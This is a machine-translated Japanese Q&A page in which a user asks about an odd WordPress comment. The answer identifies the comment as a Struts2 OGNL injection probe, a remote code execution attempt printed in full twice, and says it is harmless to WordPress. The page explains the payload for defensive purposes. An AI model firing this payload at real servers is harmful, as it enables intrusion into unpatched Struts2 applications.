ホームページ  >  記事  >  バックエンド開発  >  javascript - WordPress のコメントで誰かがこれを書きましたが、このコードは何のためにあるのでしょうか?

javascript - WordPress のコメントで誰かがこれを書きましたが、このコードは何のためにあるのでしょうか?

WBOY
WBOYオリジナル
2016-09-29 09:33:021129ブラウズ

'+(#context[”xwork.MethodAccessor.denyMethodExecution”]=new java.lang.Boolean(false),#_memberAccess[”allowStaticMethodAccess”]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={ },#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+ #b_str)、#a_resp.getWriter().flush()、#a_resp.getWriter().close())+'

回帰内容:

'+(#context[”xwork.MethodAccessor.denyMethodExecution”]=new java.lang.Boolean(false),#_memberAccess[”allowStaticMethodAccess”]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={ },#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+ #b_str)、#a_resp.getWriter().flush()、#a_resp.getWriter().close())+'

印象の中には、Java の struts2 フレームワークを実行する任意のコードの漏洩

一般的に、このようなものは漏洩の書き込みであり、結果が使用されない場合はwordpressだけであり、垃圾评论を防ぐためのツールをすぐにインストールでき、影響はありません

声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。